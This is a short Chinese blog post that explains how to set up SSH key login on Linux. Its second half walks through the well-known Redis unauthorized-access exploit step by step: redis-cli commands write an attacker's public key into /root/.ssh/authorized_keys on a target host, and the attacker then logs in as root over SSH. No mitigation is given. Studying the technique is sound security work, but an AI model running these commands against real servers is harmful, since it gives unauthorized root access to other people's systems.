使用密钥认证机制远程登录Linux

Posted 17bdw随手笔记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了使用密钥认证机制远程登录Linux相关的知识,希望对你有一定的参考价值。

密钥认证机制

创建存放key的文件

1)创建目录 /root/.ssh 并设置权限

[[email protected] ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。

[[email protected] ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。

2)创建文件 / root/.ssh/authorized_keys

[[email protected] ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用户密钥生成向导】,密钥类型选择RSA,密钥长度选择2048位,生成密钥名称,加密的密码。

复制生成的公钥到远程linux里面 /root/.ssh/authorized_keys 文件中。如果没有.ssh目录,就自行建立,并更改目录权限为700。粘贴公钥的内容,保存退出。

就可以利用密钥登录了

漏洞场景-redis未授权访问漏洞

1)本地生成秘钥

[email protected]:~# ssh-keygen  -t rsa

2)将公钥写入一个文件

[email protected]:~# cd /root/.ssh/

[email protected]:~/.ssh# (echo -e "

"; cat id_rsa.pub; echo -e "

") > foo.txt

3)连接redis写入文件

[email protected]:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
[email protected]:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
[email protected]:~/.ssh# ssh

4)连接服务器
[email protected]:~/.ssh# ssh -i id_rsa [email protected]

以上是关于使用密钥认证机制远程登录Linux的主要内容,如果未能解决你的问题,请参考以下文章

openssh远程登录服务器端和基于密钥的认证机制

使用密钥登录CentOS系统(基于密钥的认证)

使用Xshell密钥认证远程登录linux

使用PuTTYXshell远程连接linux及密钥认证连接

Mac下配置远程Linux 服务器SSH密钥认证自动登录

CentOS 7 使用PuTTYXshell远程连接和密钥认证登录